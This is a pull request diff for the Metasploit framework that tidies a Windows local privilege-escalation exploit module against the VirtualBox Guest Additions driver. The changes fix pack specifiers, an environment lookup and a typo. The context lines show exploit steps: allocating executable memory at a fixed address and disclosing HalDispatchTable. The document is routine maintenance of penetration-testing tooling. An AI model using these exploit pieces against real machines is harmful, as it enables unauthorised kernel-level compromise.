### PR TITLE
Tidy PR #3534

### DIFF
--- a/modules/exploits/windows/local/virtual_box_guest_additions.rb
+++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def fill_memory(proc, address, length, content)
 
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Local
       return Exploit::CheckCode::Safe
     end
 
-    file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
+    file_path = get_env('WINDIR') << "\\system32\\drivers\\vboxguest.sys"
     unless file?(file_path)
       return Exploit::CheckCode::Unknown
     end

--- a/modules/exploits/windows/local/virtual_box_guest_additions.rb
+++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Local
     hal_dispatch_table = find_haldispatchtable
     if hal_dispatch_table.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Filed to disclose HalDispatchTable")
+      fail_with(Failure::Unknown, "Failed to disclose HalDispatchTable")
     else
       print_good("Address successfully disclosed.")
     end


### PR DESCRIPTION
Shouldn't use native endian specific pack/unpack specifiers.

Should prefer get_env over expand_path
